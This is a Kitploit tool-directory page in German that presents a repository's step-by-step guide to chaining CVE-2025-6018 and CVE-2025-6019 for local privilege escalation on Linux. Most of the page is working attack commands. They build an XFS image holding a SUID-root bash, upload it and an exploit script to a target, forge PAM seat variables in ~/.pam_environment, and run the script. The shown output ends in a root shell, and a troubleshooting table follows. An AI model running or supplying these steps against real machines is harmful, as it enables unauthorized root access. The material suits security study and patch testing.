Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit — CVE-2025-6018 + CVE-2025-6019 Privilege-Escalation-Exploit | Kitploit
Tools/GitHubGitHub/muyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsRed TeamingBinary-Exploitation
GitHubmuyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

CVE-2025-6018 + CVE-2025-6019 Privilege-Escalation-Exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1212vor 7 MonatenNoch nicht geprüft

CVE-2025-6018 + CVE-2025-6019 Leitfaden zur Privilegien-Eskalation

中文

📋 Schnelle Ausführungsschritte

Schritt 1: XFS-Image vorbereiten (Lokale Maschine)

root@kitploit:~
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

Schritt 2: Dateien auf das Ziel hochladen

root@kitploit:~
# Upload exploit script and image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

Schritt 3: Erster Login – PAM konfigurieren

root@kitploit:~
# SSH login to target
ssh [email protected]

# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 Wichtig: Abmelden (um PAM-Konfiguration zu aktivieren)
exit

Schritt 4: Zweiter Login – Privilegien-Eskalation ausführen

root@kitploit:~
# Re-login via SSH (PAM config now active)
ssh [email protected]

# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Execute privilege escalation script
bash exp.sh

✅ Erfolgsanzeichen

Wenn die Ausnutzung erfolgreich ist, sollten Sie Folgendes sehen:

root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ ROOT FLAG                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 Fehlerbehebung

Problem

📌 Wichtige Punkte

  • ✅ Abmelden und erneut anmelden ist zwingend erforderlich: Die PAM-Konfiguration wird nur in neuen Sitzungen wirksam
  • ✅ CanReboot überprüfen: Bestätigen Sie, dass ('yes',) zurückgegeben wird, bevor Sie das Skript ausführen
  • ✅ SSH-Login verwenden: Verwenden Sie keinen Aufruf mit ssh -t user@host "cmd"

🐱 Katzenwächter

Wenn es fehlschlägt, stellen Sie sicher, dass jeder Schritt streng in der Reihenfolge ausgeführt wird!

Tool herunterladen
Lösung
CanReboot gibt ('no',) zurückStellen Sie sicher, dass Sie sich ab- und wieder angemeldet haben (Schritt 3)
Fehler Not authorizedÜberprüfen Sie den Inhalt von ~/.pam_environment auf Korrektheit
SUID bash nicht gefundenLaden Sie xfs.image erneut hoch und prüfen Sie, ob das SUID-Bit gesetzt ist